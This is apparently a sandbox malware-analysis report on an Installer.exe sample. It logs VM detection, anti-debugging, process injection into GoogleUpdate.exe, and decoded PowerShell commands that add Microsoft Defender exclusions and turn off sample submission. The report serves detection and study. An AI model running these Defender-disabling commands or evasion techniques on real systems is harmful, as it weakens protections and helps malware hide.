Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Installer.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	System information queried: FirmwareTableInformation			Jump to behavior

Tries to evade analysis by execution special instruction (VM detection)

Source: C:\Users\user\Desktop\Installer.exe	Special instruction interceptor: First address: 0000000000AF5092 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\Installer.exe	Special instruction interceptor: First address: 0000000000C1CF07 instructions rdtsc caused by: RDTSC with Trap Flag (TF)

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Installer.exe	RDTSC instruction interceptor: First address: 0000000000CC6EC8 second address: 0000000000C1CF07 instructions: 0x00000000 rdtsc 0x00000002 mov ch, ch 0x00000004 pop esi 0x00000005 xchg ax, dx 0x00000007 lahf 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop ecx 0x0000000b jmp 00007F0FF4C9DC50h 0x00000010 pop eax 0x00000011 cmovnl bp, ax 0x00000015 pop ebp 0x00000016 jmp 00007F0FF4F36352h 0x0000001b ret 0x0000001c popfd 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Installer.exe	RDTSC instruction interceptor: First address: 0000000000BA6E5A second address: 0000000000BA6E67 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 movsx eax, sp 0x00000006 movsx bx, ah 0x0000000a xchg bh, bh 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Installer.exe	RDTSC instruction interceptor: First address: 00000000006214DA second address: 00000000006214E7 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 movsx eax, sp 0x00000006 movsx bx, ah 0x0000000a xchg bh, bh 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Windows\GoogleUpdate.exe	RDTSC instruction interceptor: First address: 00000000032B4B4D second address: 00000000032B4B5C instructions: 0x00000000 rdtsc 0x00000002 movzx dx, bl 0x00000006 bswap eax 0x00000008 inc cl 0x0000000a setnle dh 0x0000000d xor bl, cl 0x0000000f rdtsc
Source: C:\Windows\GoogleUpdate.exe	RDTSC instruction interceptor: First address: 0000000002F8F2D0 second address: 0000000002F8F2DF instructions: 0x00000000 rdtsc 0x00000002 movzx dx, bl 0x00000006 bswap eax 0x00000008 inc cl 0x0000000a setnle dh 0x0000000d xor bl, cl 0x0000000f rdtsc
Source: C:\Windows\GoogleUpdate.exe	RDTSC instruction interceptor: First address: 00000000030DC131 second address: 00000000030DC135 instructions: 0x00000000 rdtsc 0x00000002 pop ebx 0x00000003 pop ecx 0x00000004 rdtsc

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe

Evasive API call chain: GetPEB, DecisionNodes, Sleep

graph_42-7037

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6064	Thread sleep count: 9639 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1500	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe TID: 5132	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 972	Thread sleep count: 8883 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 240	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4120	Thread sleep count: 1444 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980	Thread sleep count: 8965 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5116	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe TID: 5816	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\GoogleUpdate.exe TID: 1236	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\GoogleUpdate.exe TID: 5704	Thread sleep time: -3600000s >= -30000s
Source: C:\Windows\GoogleUpdate.exe TID: 4844	Thread sleep time: -92160s >= -30000s
Source: C:\Windows\GoogleUpdate.exe TID: 5704	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe TID: 1724	Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe TID: 1724	Thread sleep time: -380000s >= -30000s
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe TID: 4180	Thread sleep count: 1645 > 30
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe TID: 6024	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe TID: 1900	Thread sleep count: 261 > 30
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe TID: 2440	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676	Thread sleep count: 5222 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6080	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5740	Thread sleep count: 739 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5720	Thread sleep count: 7050 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe

Thread sleep count: Count: 1645 delay: -10

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Last function: Thread delayed
Source: C:\Windows\GoogleUpdate.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GoogleUpdate.exe	Thread delayed: delay time: 300000
Source: C:\Windows\GoogleUpdate.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9639	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8883	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1444
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8965
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Window / User API: threadDelayed 1645
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5222
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 739
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7050

Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_42-7022

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

API coverage: 9.4 %

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Installer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Installer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Installer.exe

Code function: 0_2_00A34F7C rdtsc

0_2_00A34F7C

Source: C:\Users\user\Desktop\Installer.exe

Registry key enumerated: More than 174 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Thread delayed: delay time: 120000
Source: C:\Windows\GoogleUpdate.exe	Thread delayed: delay time: 300000
Source: C:\Windows\GoogleUpdate.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Thread delayed: delay time: 120000
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: powershell.exe, 0000003A.00000002.589046846.000001ACD5829000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000009.00000003.444942285.000001D4E3855000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxml
Source: powershell.exe, 0000003A.00000002.589046846.000001ACD5829000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: GoogleUpdate.exe, 00000022.00000002.633789517.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.453252706.00000000009EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: GoogleUpdate.exe, 00000022.00000002.633789517.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.453252706.00000000009EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW,
Source: powershell.exe, 00000009.00000003.444942285.000001D4E3855000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: powershell.exe, 0000003A.00000002.589046846.000001ACD5829000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\Installer.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F27236 FindFirstFileExW,	42_2_00F27236
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F27236 FindFirstFileExW,	52_2_00F27236
Source: C:\Windows\System32\dialer.exe	Code function: 55_2_00007FF6CF7466D4 FindFirstFileExW,	55_2_00007FF6CF7466D4

Source: C:\Users\user\Desktop\Installer.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Installer.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

Code function: 1_2_00007FF738DB1DD0 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

1_2_00007FF738DB1DD0

Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F216C0 mov eax, dword ptr fs:[00000030h]	42_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F216C0 mov eax, dword ptr fs:[00000030h]	42_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F216C0 mov ecx, dword ptr fs:[00000030h]	42_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F216C0 mov eax, dword ptr fs:[00000030h]	42_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F216C0 mov eax, dword ptr fs:[00000030h]	42_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F2809B mov eax, dword ptr fs:[00000030h]	42_2_00F2809B
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F21000 mov eax, dword ptr fs:[00000030h]	42_2_00F21000
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F21000 mov ecx, dword ptr fs:[00000030h]	42_2_00F21000
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F21000 mov eax, dword ptr fs:[00000030h]	42_2_00F21000
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F21000 mov eax, dword ptr fs:[00000030h]	42_2_00F21000
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F21000 mov eax, dword ptr fs:[00000030h]	42_2_00F21000
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F25A50 mov ecx, dword ptr fs:[00000030h]	42_2_00F25A50
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F213B0 mov eax, dword ptr fs:[00000030h]	42_2_00F213B0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F213B0 mov eax, dword ptr fs:[00000030h]	42_2_00F213B0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F216C0 mov eax, dword ptr fs:[00000030h]	52_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F216C0 mov eax, dword ptr fs:[00000030h]	52_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F216C0 mov ecx, dword ptr fs:[00000030h]	52_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F216C0 mov eax, dword ptr fs:[00000030h]	52_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F216C0 mov eax, dword ptr fs:[00000030h]	52_2_00F216C0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F2809B mov eax, dword ptr fs:[00000030h]	52_2_00F2809B
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F21000 mov eax, dword ptr fs:[00000030h]	52_2_00F21000
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F21000 mov ecx, dword ptr fs:[00000030h]	52_2_00F21000
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F21000 mov eax, dword ptr fs:[00000030h]	52_2_00F21000
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F21000 mov eax, dword ptr fs:[00000030h]	52_2_00F21000
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F21000 mov eax, dword ptr fs:[00000030h]	52_2_00F21000
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F25A50 mov ecx, dword ptr fs:[00000030h]	52_2_00F25A50
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F213B0 mov eax, dword ptr fs:[00000030h]	52_2_00F213B0
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F213B0 mov eax, dword ptr fs:[00000030h]	52_2_00F213B0

Source: C:\Users\user\Desktop\Installer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

Code function: 1_2_00007FF738DA6CE0 free,IsDebuggerPresent,RaiseException,

1_2_00007FF738DA6CE0

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

Code function: 1_2_00007FF738DA6EE0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,

1_2_00007FF738DA6EE0

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

Code function: 1_2_00007FF738D943C0 SHGetFolderPathW,GetFileSize,GetProcessHeap,HeapAlloc,RtlAllocateHeap,

1_2_00007FF738D943C0

Source: C:\Users\user\Desktop\Installer.exe

Code function: 0_2_00A34F7C rdtsc

0_2_00A34F7C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Installer.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: 1_2_00007FF738D91190 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,malloc,memcpy,_initterm,GetStartupInfoW,exit,	1_2_00007FF738D91190
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F22929 SetUnhandledExceptionFilter,	42_2_00F22929
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F22A35 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_00F22A35
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F26BFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_00F26BFC
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 42_2_00F22795 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_00F22795
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F22929 SetUnhandledExceptionFilter,	52_2_00F22929
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F22A35 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	52_2_00F22A35
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F26BFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	52_2_00F26BFC
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: 52_2_00F22795 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	52_2_00F22795
Source: C:\Windows\System32\dialer.exe	Code function: 55_2_00007FF6CF7416B4 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,	55_2_00007FF6CF7416B4
Source: C:\Windows\System32\dialer.exe	Code function: 55_2_00007FF6CF741858 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	55_2_00007FF6CF741858
Source: C:\Windows\System32\dialer.exe	Code function: 55_2_00007FF6CF74200C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	55_2_00007FF6CF74200C
Source: C:\Windows\System32\dialer.exe	Code function: 55_2_00007FF6CF74565C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	55_2_00007FF6CF74565C
Source: C:\Windows\System32\dialer.exe	Code function: 55_2_00007FF6CF7421F0 SetUnhandledExceptionFilter,	55_2_00007FF6CF7421F0

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

Section loaded: C:\Users\user\AppData\Local\Temp\7321.tmp target: C:\Windows\System32\dialer.exe protection: readonly

Jump to behavior

Encrypted powershell cmdline option found

Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @('C:\Users\Revelin', 'C:\Program Files') -Force
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process created: Base64 decoded Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @('C:\Users\Revelin', 'C:\Program Files') -Force	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process created: Base64 decoded Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe

Memory allocated: C:\Windows\GoogleUpdate.exe base: F80000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Memory written: C:\Windows\GoogleUpdate.exe base: F80000 value starts with: 4D5A			Jump to behavior
